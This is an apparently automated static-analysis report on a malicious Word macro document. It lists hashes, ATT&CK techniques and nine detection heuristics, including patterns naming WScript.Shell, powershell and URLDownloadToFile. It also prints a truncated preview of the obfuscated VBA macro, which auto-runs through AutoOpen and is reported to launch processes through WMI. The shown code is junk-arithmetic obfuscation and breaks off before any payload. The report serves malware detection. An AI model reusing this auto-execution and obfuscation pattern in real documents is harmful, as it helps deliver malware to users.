Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 7836eca87915833b…

MALICIOUS

Office (OLE)

Size: 180.1 KB
Created: 2019-04-23 06:36:00
Authoring application: Microsoft Office Word
First seen: 2019-08-04
MD5: bb67e1aad0c170dddf21d8618db2c944
SHA-1: 0d1839fef39243edacd92b629fd554f9c1ab453b
SHA-256: 7836eca87915833bc896f259106067f5b2b683c748259cccdd862d0bc4677dfd
Risk Score: 342

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1204.002 Malicious File
  • T1137.001 Office Application Startup: Office Application

The sample contains a VBA macro with an autoopen subroutine, which is a common technique for executing malicious code upon opening the document. The macro utilizes GetObject and CreateObject to instantiate the Win32_Process class, indicating an intent to launch processes. This is further supported by the critical heuristic firing for VBA WMI Win32_Process launcher and obfuscation of the Win32_Process keyword. The macro's obfuscated nature and the presence of auto-execution markers suggest it is designed to download and execute a secondary payload.

Heuristics (9)

  • ClamAV: Doc.Malware.Sagent-6953854-0 (critical) CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Sagent-6953854-0
  • VBA macros detected (medium, 5 related findings) OLE_VBA_MACROS
    Document contains VBA macro code.
  • VBA WMI Win32_Process launcher (critical) OLE_VBA_WMI_PROCESS_CREATE
    VBA macro builds or references a WMI moniker for Win32_Process and invokes .Create to start a command. This is a high-confidence macro execution chain that often hides the WMI class name through string concatenation or helper functions.
  • Dangerous API name reassembled from split string literals (critical) OLE_VBA_SPLIT_KEYWORD_OBFUSCATION
    VBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.
  • AutoOpen macro (high) OLE_VBA_AUTOOPEN
    AutoOpen macro present.
  • GetObject call (high) OLE_VBA_GETOBJ
    GetObject call present.
  • VBA p-code auto-exec with execution tokens (high) OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker (medium) OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL (info) EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 49501 bytes
SHA-256: a9b6417881fe4ebf15164fa566fe2c3a34fadf0d4cf324ba3fb0186bf6afa78b

Preview of the extracted script (first 1,000 lines):
Attribute VB_Name = "WBAX4Q"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "TkQDAX"
Attribute VB_Base = "0{923EF9BA-C5A5-4A28-9FCC-341840A52C4B}{E325704E-9898-4AD2-A694-307277347182}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "M4QAUGAA"
Attribute VB_Base = "0{010F02D7-82B8-4A7D-8963-5A0CAB71E9EE}{E3D5D4FF-F55F-474F-B32E-001F9DF92F3B}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "jDkXZD"
Sub autoopen()
   If UGGABUUc = qcAACwA Then
     woBBDcA = b_DAA_Q - zGDAABA
       ElseIf a_QkZcU = rk1AAAxA Then
      Select Case KDCBAAA
         Case 665953356
       zUQAQU = 295452934 * zkCC_AA / 272875986 * Hex(645923673 * Fix(lZADUU / CStr(f_G1AQAk) * qQAXx4A - Fix(262456776)) - 111596868 * Round(zDXAX_A + Hex(RkBUwCA) / 810320931 - 612533359))
       p4UAwQQ = CA1D14D + G14GCwU * zA1QAA / Sqr(VGDUACCA) / 340297304 - Hex(okABAAZo) + (850598483 / 125331810)
      End Select
End If
   If MBXAZDAA = TCQUBBX Then
     EBA_XUAk = JCx4AUUA - QZACAD
       ElseIf ZkXoAZcA = zQXwAA_ Then
      Select Case RDUXZQB
         Case 678427463
       FQBoQAD_ = 288055116 * fAZxAGA / 82402907 * Hex(176598690 * Fix(LcXUQAU / CStr(qAADBA) * ic4XGoA - Fix(912236363)) - 193361679 * Round(FC4UAA + Hex(kBoAQXCG) / 188354176 - 719185047))
       IQAZXD = E_A4AZx + B1AQ1X * bBxUwQXQ / Sqr(QGDXAD) / 752768292 - Hex(BAUAAA) + (437726443 / 153289810)
      End Select
End If
   If VwGAAw = R1oAAwo Then
     AkAAUU = uAAAAQC - px_XD1GD
       ElseIf sCxwAA = FCwxAQG Then
      Select Case BkXAA1G
         Case 414603953
       vAAGAA = 242799538 * tQxDAAB / 497382290 * Hex(538953488 * Fix(zZUAAA / CStr(zAAAAXc) * NQcBwA - Fix(497915745)) - 941560784 * Round(zGAAkA + Hex(UwcxAo) / 828388635 - 343693970))
       lDoAZBw = fUDwoAww + rwXwk4D1 * EAoACwA / Sqr(JZBUBDDA) / 994423747 - Hex(wGD_AAQ) + (860725268 / 777915815)
      End Select
End If
NAAcXAQ
   If DZ_GQQ = UAAU11A Then
     MAAABDB = KxUQDB - G4UAGXD
       ElseIf VcCx1DBA = kAwAAQA Then
      Select Case B4CABo
         Case 158760453
       T4oQ1DCo = 964998818 * zAUBCBDo / 470827955 * Hex(91131088 * Fix(qwCA_UD / CStr(TBGCAC) * KAAc_X - Fix(209499863)) - 892944093 * Round(AQAwAk + Hex(cAC_Ao) / 148092138 - 765974476))
       C4XABA = WUDxAAD + doAGQQ * WwA4CBG / Sqr(sQkDcQCB) / 684067665 - Hex(b4GUAQBA) + (432265612 / 592400982)
      End Select
End If
   If pAXAAw = jcAUZZkU Then
     zXB4Ak = EDAkZD - LwUBQxAD
       ElseIf EkGACDC = sQX1ABkk Then
      Select Case aZAUB1A
         Case 317346123
       zAZZ1xU = 537491267 * SXQ4_UA / 918842211 * Hex(324874682 * Fix(tkA4cAAk / CStr(nwZAAx) * BBBA4D - Fix(322000556)) - 958078217 * Round(JAccAQAC + Hex(PwcA1U4C) / 41056031 - 808104519))
       TA1AkAZ = BABAZx + kABXQUAo * K_DABwBo / Sqr(zGAA1A1A) / 153096890 - Hex(UBAADAA4) + (204781534 / 461767969)
      End Select
End If
End Sub

Attribute VB_Name = "bkZQAZB"
Function NAAcXAQ()
On Error Resume Next
   If CUUAAAQ = mxAcA1DD Then
     zoUADA = LABCDA - iQDAA_
       ElseIf GZC1UAQc = NQADAZAX Then
      Select Case rAAABxA
         Case 604543125
       u_GQABcA = 399598486 * sAUAoA1 / 141653988 * Hex(859298786 * Fix(wADA4k / CStr(OCcxAAoB) * cAQwAc - Fix(881020137)) - 527567190 * Round(FA_kAAQo + Hex(wBQAAUB) / 895796011 - 575972943))
       SBDAXDUQ = DCxBC_o + OxoBDU * IAAcCA / Sqr(YDAUUADB) / 148585570 - Hex(ZAkAcQZB) + (980923143 / 473941068)
      End Select
End If
   If oAAZAAAG = axABZ4w Then
     AD4UQAow = jGkkQAx - cQAkA4BA
       Els
... (truncated)